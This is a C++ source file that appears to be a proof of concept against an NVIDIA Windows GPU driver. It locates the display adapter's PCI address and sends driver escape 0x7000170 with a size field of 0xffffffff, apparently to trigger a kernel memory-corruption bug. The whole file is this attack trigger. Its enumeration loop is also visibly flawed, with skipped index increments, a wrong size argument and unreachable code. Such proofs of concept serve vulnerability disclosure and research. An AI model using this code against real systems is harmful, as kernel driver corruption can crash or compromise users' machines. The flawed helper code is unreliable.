// gpu_poc.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <windows.h>
#include <setupapi.h>

#pragma comment(lib, "setupapi.lib")

#include <initguid.h>
DEFINE_GUID(GUID_DEVCLASS_DISPLAY, 0x4D36E968, 0xE325, 0x11CE, 0xBF, 0xC1, 0x08, 0x00, 0x2B, 0xE1, 0x03, 0x18);

#include "Gpu.h"

#pragma pack(push, 1)
struct Escape7000170Data {
	DWORD bdf;
	DWORD size;
	DWORD unknown[37];
};
#pragma pack(pop)

using Escape7000170 = NvEscape<Escape7000170Data>;

static_assert(sizeof(Escape7000170) >= 0x9c, "escape size");

DWORD GetNvidiaBdf() {
	HDEVINFO dev_info = SetupDiGetClassDevs(
		&GUID_DEVCLASS_DISPLAY,
		nullptr,
		nullptr,
		DIGCF_PRESENT);

	if (dev_info == INVALID_HANDLE_VALUE) {
		return 0;
	}

	SP_DEVICE_INTERFACE_DATA interface_data;
	DWORD index = 0;
	interface_data.cbSize = sizeof(interface_data);

	SP_DEVINFO_DATA data;
	data.cbSize = sizeof(SP_DEVINFO_DATA);
	while (SetupDiEnumDeviceInfo(dev_info, index, &data)) {
		DWORD bus;
		if (!SetupDiGetDeviceRegistryProperty(dev_info, &data, SPDRP_BUSNUMBER,
			nullptr, reinterpret_cast<PBYTE>(&bus),
			sizeof(bus), nullptr)) {
			continue;
		}

		DWORD address;
		if (!SetupDiGetDeviceRegistryProperty(dev_info, &data, SPDRP_ADDRESS,
			nullptr, reinterpret_cast<PBYTE>(&address),
			sizeof(bus), nullptr)) {
			continue;
		}

		DWORD function = address & 0xffff;
		DWORD device = address >> 16;

		// not entirely sure about the order here.
		return bus << 8 | device << 4 | function;
		++index;
	}

	return 1;
}

int main() {
	Gpu gpu;
	if (!gpu.Init()) {
		fprintf(stderr, "Failed to init gpu.\n");
		return 1;
	}

	Escape7000170 escape(0x7000170, 0x4e562a2a);
	escape.data.bdf = GetNvidiaBdf();
	escape.data.size = 0xffffffff;
	if (gpu.Escape(&escape, sizeof(escape))) {
		fprintf(stderr, "Failed escape.\n");
		return 1;
	}

	return 0;
}

